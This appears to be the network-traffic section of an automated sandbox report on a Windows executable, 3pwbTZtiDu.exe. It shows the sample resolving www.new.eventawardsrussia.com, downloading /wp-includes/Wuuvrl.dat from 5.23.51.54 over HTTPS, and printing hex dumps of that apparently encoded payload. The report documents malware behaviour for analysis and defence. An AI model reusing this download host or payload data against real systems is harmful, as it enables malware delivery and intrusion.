                                    Jan 10, 2025 22:30:31.377341986 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.377357960 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.377403975 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.377418995 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.377435923 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.377458096 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.377804041 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.377819061 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.377862930 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.377876997 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.377890110 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.377945900 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.407569885 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.407596111 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.407799959 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.407833099 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.407887936 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.432023048 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.432070971 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.432143927 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.432178974 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.432199955 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.432218075 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.467485905 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.467505932 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.467592001 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.467629910 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.467672110 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.468034029 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.468050003 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.468107939 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.468126059 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.468166113 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.468827009 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.468842983 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.468919039 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.468940973 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.468981981 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.469458103 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.469474077 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.469532013 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.469554901 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.469605923 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.470307112 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.470323086 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.470376968 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.470393896 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.470405102 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.470407009 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.470451117 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.498312950 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.498332024 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.498502016 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.498548985 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.522507906 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.522581100 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.522608995 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.522629976 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.522645950 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.555902004 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.555924892 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.556081057 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.556111097 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.557995081 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.558021069 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.558068037 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.558085918 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.558099031 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.558114052 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.558115005 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.558161020 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.558167934 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.558192015 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.558203936 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.558227062 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.558252096 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.558258057 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.558281898 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.561335087 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.561355114 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.561428070 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.561439991 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.561460972 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.561486006 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.561494112 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.561532021 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.561543941 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.561582088 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.588608027 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.588630915 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.588769913 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.588804007 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.588851929 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.612999916 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.613018990 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.613203049 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.613230944 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.613271952 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.646553040 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.646572113 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.646744967 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.646786928 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.646837950 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.647226095 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.647250891 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.647279978 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.647286892 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.647300005 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.647444963 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.647602081 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.647634029 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.647665024 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.647670984 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.647696972 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.647720098 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.648319006 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.648339033 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.648376942 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.648382902 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.648405075 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.648428917 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.649012089 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.649025917 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.649082899 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.649090052 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.649136066 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.649610043 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.649625063 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.649655104 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.649660110 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.649688959 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.649712086 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.679085016 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.679106951 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.679270029 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.679302931 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.679452896 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.703718901 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.703768015 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.703886032 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.703886032 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.703916073 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.703957081 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.750356913 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.750372887 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.750498056 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.750526905 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.750566006 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.750946045 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.750973940 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.750993967 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.750998974 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.751024008 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.751041889 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.751589060 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.751645088 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.751648903 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.751687050 CET443497205.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:31.751696110 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.751725912 CET49720443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:31.813513041 CET49720443192.168.2.125.23.51.54

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 10, 2025 22:30:06.727814913 CET5785353192.168.2.121.1.1.1
                                    Jan 10, 2025 22:30:06.889815092 CET53578531.1.1.1192.168.2.12

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 10, 2025 22:30:06.727814913 CET192.168.2.121.1.1.10xc22dStandard query (0)www.new.eventawardsrussia.comA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 10, 2025 22:30:06.889815092 CET1.1.1.1192.168.2.120xc22dNo error (0)www.new.eventawardsrussia.com5.23.51.54A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • www.new.eventawardsrussia.com

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.12497105.23.51.544436656C:\Users\user\Desktop\3pwbTZtiDu.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-10 21:30:07 UTC101OUTGET /wp-includes/Wuuvrl.dat HTTP/1.1
                                    Host: www.new.eventawardsrussia.com
                                    Connection: Keep-Alive
                                    2025-01-10 21:30:08 UTC218INHTTP/1.1 200 OK
                                    Server: nginx/1.26.1
                                    Date: Fri, 10 Jan 2025 21:30:07 GMT
                                    Content-Length: 913928
                                    Connection: close
                                    Last-Modified: Mon, 09 Dec 2024 23:20:36 GMT
                                    ETag: "df208-628de9cada0b4"
                                    Accept-Ranges: bytes
                                    2025-01-10 21:30:08 UTC16166INData Raw: 25 be 36 86 8b 9b ee 63 4c 02 9e ff e2 3a e6 17 2e 6c 19 66 6d 55 5d ec 0c 74 d7 84 39 38 52 d8 0c d3 0d 22 37 b0 97 8b 10 0d 1f 53 9a a5 0f a5 da 30 98 d3 9d 4c cc ce 70 bd 48 02 b6 64 46 b6 7c 6b fe 8d 1b ad e8 33 30 48 72 0e 20 2d c8 8d f7 b9 68 09 53 c7 65 34 28 e7 82 32 8b a3 54 dd 0c be ab 66 90 ff ad 8b 9f 92 69 06 f1 92 fe 57 90 96 fa 82 0e ed f3 88 e8 54 d8 2e c7 51 8a a0 c2 4d 89 7c 87 ba 86 49 1a f7 63 da ab d8 b9 8f 4c 71 a9 ef 50 57 fe 86 a7 c2 f3 82 5c 19 60 9f 4e 48 72 dd 4c ea 05 a3 32 d3 95 94 50 7a c0 95 ee fc be 5d 68 c2 50 94 9c 74 1e cd 1c 6c 01 9c f2 3e 1e c1 1d bb f3 40 5e eb e1 56 3f ad bf 97 13 de 24 c9 75 34 33 b1 ea f9 1c 52 45 fd 04 4d a3 25 e4 87 b2 61 fe c2 66 5f 88 34 21 2d 47 63 1b 76 9f e5 50 e4 b4 62 47 67 6c b9 b6 bc 29
                                    Data Ascii: %6cL:.lfmU]t98R"7S0LpHdF|k30Hr -hSe4(2TfiWT.QM|IcLqPW\`NHrL2Pz]hPtl>@^V?$u43REM%af_4!-GcvPbGgl)
                                    2025-01-10 21:30:08 UTC16384INData Raw: 5a dc 3a f4 33 06 3c 22 4b 1d f5 f5 46 ba ea 1f de 0f 03 7c 4b 50 9b 00 01 d4 bb 95 72 8a 14 ab 65 ee 0a ec 81 e3 39 1c 5e 7f c5 4a fd 01 d6 49 5f d5 8c 50 e6 42 91 33 b0 12 65 3f 76 fa 36 fd 45 86 fa 66 2a cd f5 6f e0 0d 23 69 f4 98 b3 36 80 c7 1f 4f 70 7c c8 86 0d 52 5c 3f c5 d5 24 69 09 0b 32 8a c8 4f d2 e7 e5 db e2 a9 68 b7 a0 84 0b db 38 c7 aa 50 b4 97 50 a8 c2 9e 1b 88 c7 a9 a8 c2 77 76 54 8a 10 22 e1 e4 d4 3f d2 b0 8b 47 d3 8e 1b 78 9c eb 57 b7 9e 77 83 fa c5 da 72 05 a8 25 cc 39 e7 94 0a 7d b7 4a 0e 49 a9 6b bb 80 6e fb 63 4b b9 91 7a 74 49 57 1c d4 f4 4d 81 bc 22 70 70 05 71 43 c3 5d 2d 9f 59 a1 9f 4d c8 1d 28 f8 d4 e3 03 8e c5 56 5d c9 8d 95 31 8d cf a4 b4 f3 07 a9 81 8a 86 46 cb 42 10 2b 18 4a 6b e0 7d 78 d9 28 53 02 f5 83 a8 7d f1 47 9e ea 75
                                    Data Ascii: Z:3<"KF|KPre9^JI_PB3e?v6Ef*o#i6Op|R\?$i2Oh8PPwvT"?GxWwr%9}JIkncKztIWM"ppqC]-YM(V]1FB+Jk}x(S}Gu
                                    2025-01-10 21:30:08 UTC16384INData Raw: 35 2c 85 b5 97 fe 1e dc 27 3c aa 59 2a 2e 4f 8d 5c 53 40 3e fa dc 7a 33 4a 16 be ab bc 21 48 3a be 8c f8 83 2b 0d 43 f2 72 80 77 de 1e 75 dc 60 cb e7 27 3b 15 07 c7 83 7c 6e 86 14 2d d7 0c de 72 a8 e1 12 f9 75 87 35 bd 22 1f 68 98 41 97 7a 53 25 2a 8f 75 d1 51 28 31 ff 71 41 c2 c7 83 de 4d fc da 8e 77 01 9a 79 c2 e8 30 f3 a2 d8 39 23 7d 5a a2 c2 7a d6 f2 05 1f 23 75 f9 51 0b 56 08 cf 15 c8 ad c1 a5 2b 92 80 fe f4 29 ac 7e 0f f0 c3 8e 17 cc e8 b7 4f 97 96 75 1b e6 44 96 51 be f5 96 f7 fc 7f a1 b0 ea f5 f6 2a c1 63 0a c6 cd 56 01 f6 95 c5 ca 09 9c 1b ff f9 ce 2a 62 c5 38 3f 4d 90 d5 7d d6 ca 45 47 f2 ec 15 2c 69 bd 7a e3 5f 1e 20 1f 3a 92 a9 ec 2e 02 b2 e0 e3 e1 f9 34 a6 2e de 0e b8 23 3e 05 7a 72 f6 2a 48 f0 30 e4 fe 12 33 76 22 d5 f3 14 24 73 1d 90 51 d9
                                    Data Ascii: 5,'<Y*.O\S@>z3J!H:+Crwu`';|n-ru5"hAzS%*uQ(1qAMwy09#}Zz#uQV+)~OuDQ*cV*b8?M}EG,iz_ :.4.#>zr*H03v"$sQ
                                    2025-01-10 21:30:08 UTC16384INData Raw: a2 ec 3a a2 63 c7 14 2b 98 a5 53 ce e0 03 5e 26 73 f8 23 a9 d9 eb cd dc e7 a3 9e ad b6 6b 2e 44 36 51 52 3e 8a d7 1e b5 e8 03 26 5f ac 15 ab b0 5f c5 f8 08 2e ca 85 17 74 e7 8d a0 c9 b6 8d 0c 21 30 11 04 ea 9b 6c 45 41 d3 dc 16 9c 8f c6 fc a7 5f 66 53 9e e1 6d fb 26 c7 c8 84 53 4e 99 84 39 f5 d8 ee f6 ec 8f 52 88 44 82 8d 68 ae bc 5f 0b ea 7e e4 12 f2 f3 bd 8b cb 03 97 a6 ea ad 9d 6d 0a e2 3c 80 4c c3 07 60 d2 11 64 ba 82 7d 03 56 cb e8 31 e8 b2 5f 53 f1 70 28 09 8b a1 a2 ea cf 4b 05 37 f9 18 9c c1 b7 8a 93 a6 43 55 5f 7f 8c ca 1d 1b e4 8a 76 81 78 54 da 04 36 b2 69 a7 e6 87 d7 11 74 14 1d dc 20 a8 2d 40 48 d0 c4 4f dc 3e 9c 54 ed 1c 69 b2 86 87 1a 7e ca 0b fb b1 75 52 fb 4c 08 45 a7 66 38 67 86 9b 7f ce 41 18 77 f7 ef 61 1a 5a 38 a1 1d 5a 4e f5 a1 a2 0f
                                    Data Ascii: :c+S^&s#k.D6QR>&__.t!0lEA_fSm&SN9RDh_~m<L`d}V1_Sp(K7CU_vxT6it -@HO>Ti~uRLEf8gAwaZ8ZN
                                    2025-01-10 21:30:08 UTC16384INData Raw: 54 0a f8 1f 48 fe 6b f3 dd e7 8f 97 ac 69 82 98 25 a7 60 05 47 a7 69 50 ee 78 61 d8 9b bf f6 95 f9 93 33 0f 08 1c e0 fe 1e af 08 a2 06 31 5d 67 54 0d cc 8a 81 78 c9 22 48 a7 83 bb 98 ab 21 42 46 1a e7 90 d1 40 92 12 03 31 f2 f8 8c 62 c3 4c 8d 6f b2 8f 08 69 50 c2 dd 27 a0 94 8d 4f 05 8c b7 89 fd 0a b6 30 e6 f7 1e 62 b2 a9 89 47 77 e4 15 40 04 5a c7 be 2e 30 b5 26 65 b5 8b e9 bf f8 37 2e f7 21 bd 02 97 e1 e8 25 31 b3 08 44 77 73 b1 a9 f6 cc e4 d9 1a 58 35 5e 93 00 2c 5b 47 e8 9e 9d 57 8e 0d 53 10 42 7d 0b 7b b0 8c 83 ab e1 fe 9f 09 96 0b 17 85 97 bb 0f cc 17 7d c9 1a df ec 05 78 10 e9 2f a2 76 b9 da 75 e1 81 59 8f 58 51 12 a8 cf 68 d9 36 42 ae c8 d3 ec f4 7a c5 14 4d ca 6b 93 d2 df 8b f5 85 0d b7 f1 99 32 54 52 66 20 6a aa c3 8f df f1 e9 91 93 4c 52 5c 65
                                    Data Ascii: THki%`GiPxa31]gTx"H!BF@1bLoiP'O0bGw@Z.0&e7.!%1DwsX5^,[GWSB}{}x/vuYXQh6BzMk2TRf jLR\e
                                    2025-01-10 21:30:08 UTC16384INData Raw: d4 fd 98 9c 6f 14 d5 fa 47 a7 a9 79 32 ab 55 4f 0c 32 b0 eb 89 b2 b5 1a 17 91 65 3a 6f a9 75 9b 68 d3 bc 19 6b 41 26 b8 f4 0c 98 6a 7c d9 73 91 de 36 89 fa 15 ff 04 90 cf 25 95 33 51 05 9f 70 35 a3 3f 7f a9 a6 13 9b cc 70 2b 08 e1 64 b7 af e4 f9 31 ca 66 d6 c1 c8 b5 4e 43 36 bd af aa da 5c 89 25 07 21 0e a0 1b fa 64 71 52 86 fc 3a 75 de 31 53 ab c6 d2 f7 62 28 31 7c f4 eb 45 a9 15 a6 06 d9 d7 fa 0a e3 28 b2 51 9a 0a 3a f8 63 83 16 9d b1 f0 73 03 91 03 73 f8 bf 0b 62 7f 6e 13 6e 32 c8 a8 e6 bb 66 d2 e5 fd 9a 69 b7 39 ae 94 14 4c 2b 85 bf aa 16 92 f9 8d fc 7f f1 7f 56 d0 19 cb 66 d1 72 f3 50 47 43 b2 10 b2 22 bc ab 6e 38 83 4b c8 15 55 94 e3 c0 5d 86 bc 1e d3 85 18 5d c7 41 86 6a 20 36 d0 81 8d 28 5c 90 58 2b 9d 9c 0a 4c 6c 87 88 51 a8 73 9f e9 be 12 54 c9
                                    Data Ascii: oGy2UO2e:ouhkA&j|s6%3Qp5?p+d1fNC6\%!dqR:u1Sb(1|E(Q:cssbnn2fi9L+VfrPGC"n8KU]]Aj 6(\X+LlQsT
                                    2025-01-10 21:30:08 UTC16384INData Raw: db 36 a0 60 87 5b 95 4f 9d 3e 5a 45 38 aa 44 c7 5a e2 c9 9f a5 8a a0 95 f3 be db b6 6f 69 0c b6 43 67 7e 52 76 29 87 9b 7b d3 82 96 1f 63 ba 1d 3e ba c8 21 e0 19 59 76 ed 22 ab f2 9a c2 89 03 6e 8b 85 73 3f d3 0a cc 9f 4f 53 6e 69 ac 47 ad 9b 36 5b 78 cb 57 66 66 af ca 04 b0 26 ac f0 c0 3f 46 7c 6b d5 a9 79 77 f4 40 8f c4 23 10 b6 23 6e 24 d5 2b 35 95 42 1b fe 40 bf c3 25 b4 89 5a 42 4f 4c d4 75 16 f2 92 73 6e 14 4b 44 e4 e8 3b 46 77 96 4d 58 33 2b f0 45 f6 64 8a a3 64 ec 26 21 72 54 67 18 4e 17 09 06 d2 0e 00 81 dc 7b ca 59 5e 39 17 2e 1a eb 17 25 64 11 8e b9 9a c4 59 00 c0 03 f6 71 87 a9 4b 0c b3 a6 cb 39 67 c6 b8 ef ec 0b 2d 4d fd 48 64 55 35 f3 59 2f e1 7b c6 e1 6f cd c5 b3 b3 8a 31 e3 86 d4 f5 9c 09 91 f2 13 dd dd 95 e7 37 97 ed 7d 15 c3 21 04 14 e4
                                    Data Ascii: 6`[O>ZE8DZoiCg~Rv){c>!Yv"ns?OSniG6[xWff&?F|kyw@##n$+5B@%ZBOLusnKD;FwMX3+Edd&!rTgN{Y^9.%dYqK9g-MHdU5Y/{o17}!
                                    2025-01-10 21:30:08 UTC16384INData Raw: 98 e8 d3 0a c0 da 96 4c 47 36 e8 b0 b9 ff 28 7d b9 6f 70 d4 58 2f 4f 9e e2 dc 17 34 f9 82 36 f5 df 09 2d 80 85 6c 33 80 54 9e 75 d6 0f a6 01 6d c9 4f 26 bd e7 e8 8f 83 cf fd 7b fa f1 80 46 89 80 84 e9 e6 e0 f2 d7 38 fd 46 de c4 19 11 f7 26 f8 89 d6 d9 f4 17 ff 40 d7 2d 19 68 6d a3 17 fd 39 e7 ad aa 02 5b 2d de 18 d4 cd 89 23 e7 7a d4 38 e2 7b 3a fb f7 cd ef 3a 2f fe a1 3a 79 d0 6e 5d e9 21 9c 91 c0 56 26 7a c0 5d e8 b1 1b 44 92 f4 7f d4 5b 40 4d 1f 55 5a 0e b6 e5 a6 a4 f6 d3 2f 9c 4b 28 8f a9 88 01 ae 21 1f b2 38 f2 12 91 be c8 18 24 84 db 08 b2 55 a2 dc 03 9c 51 d8 15 37 44 ec 2c f1 92 1a cb 1a 0c 36 4f 20 f3 00 42 16 07 8d 4a 8b fe bb 3d 00 72 d9 8d 0b ed 31 80 9e d7 ef df bc 53 61 4c 2d 23 b1 e6 91 bc 9c 1d 84 7f 4d bd 91 3a ad 34 74 d6 d4 77 8d 34 89
                                    Data Ascii: LG6(}opX/O46-l3TumO&{F8F&@-hm9[-#z8{::/:yn]!V&z]D[@MUZ/K(!8$UQ7D,6O BJ=r1SaL-#M:4tw4
                                    2025-01-10 21:30:08 UTC16384INData Raw: 61 e3 c7 f4 1e d3 73 f9 58 5b ff 41 68 a1 2e 4f 70 24 f2 be 99 b8 58 7d 97 39 c2 29 a6 a1 e1 a3 3c 1b c8 f3 4b ae 2f 9c e0 50 b2 66 32 20 fe ed f5 85 5b 01 78 e6 e0 28 ec 7b 8c ed 33 83 11 ca 07 48 e5 d8 9b d0 73 33 cd 3d a1 d2 50 b9 aa 18 80 95 83 ea e3 44 c5 e3 15 d5 a7 e5 05 f5 12 a4 7b 5e 98 68 91 01 f4 b3 f5 b6 25 20 69 7d ef 54 92 12 49 2a 78 01 e7 6a c2 da 04 8f 28 6f 9e a5 d0 25 e7 17 8c 3f 62 dc 93 a0 4f 77 10 3f 2c da 22 a4 22 48 d6 a5 cd 0e 07 1a 97 00 56 44 fe c4 38 9c ed d9 5c 5b 59 25 07 ec 14 34 27 b2 24 20 ae 37 30 34 ac 0f 32 ce 0f cb cf 39 e1 ae 56 38 e9 79 ab 64 a0 f6 82 82 0c 63 0c c6 e5 e5 93 84 5e f4 f0 fa 5e c4 6e 47 03 af 1c 51 52 43 de c1 35 3b ae ec 32 0b fb 03 c8 11 2c e3 85 56 f8 b2 0d 3c ea f9 2e c0 f6 45 95 76 ff d5 96 4f 6d
                                    Data Ascii: asX[Ah.Op$X}9)<K/Pf2 [x({3Hs3=PD{^h% i}TI*xj(o%?bOw?,""HVD8\[Y%4'$ 70429V8ydc^^nGQRC5;2,V<.EvOm
